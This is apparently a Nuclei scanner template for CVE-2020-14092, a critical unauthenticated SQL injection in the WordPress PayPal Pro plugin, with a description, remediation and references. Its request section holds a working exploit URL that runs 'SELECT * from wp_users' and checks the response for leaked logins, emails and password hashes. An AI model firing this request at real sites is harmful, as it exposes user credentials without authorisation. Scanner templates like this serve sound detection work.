漏洞描述
WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format.
id: CVE-2020-14092
info:
name: WordPress PayPal Pro <1.1.65 - SQL Injection
author: princechaddha
severity: critical
description: WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Update to the latest version of the WordPress PayPal Pro plugin (1.1.65 or higher) to mitigate the SQL Injection vulnerability.
reference:
- https://wpscan.com/vulnerability/10287
- https://wordpress.dwbooster.com/forms/payment-form-for-paypal-pro
- https://nvd.nist.gov/vuln/detail/CVE-2020-14092
- https://wordpress.org/plugins/payment-form-for-paypal-pro/#developers
- https://wpvulndb.com/vulnerabilities/10287
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-14092
cwe-id: CWE-89
epss-score: 0.86885
epss-percentile: 0.99397
cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: ithemes
product: paypal_pro
framework: wordpress
tags: cve,cve2020,wp-plugin,sqli,paypal,wpscan,wordpress,ithemes
http:
- method: GET
path:
- "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- '"user_login"'
- '"user_email"'
- '"user_pass"'
- '"user_activation_key"'
condition: and
- type: status
status:
- 200
# digest: 490a00463044022004c4bf37caab2f140e26a831b94c4c6f69a2da70f8afd12f8b3b13c3b3bdce3202203a00c72d18309504b051100f0e2647dacc1a59438100fca0e04885394fddd1b6:922c64590222798bb761d5b6d8e72950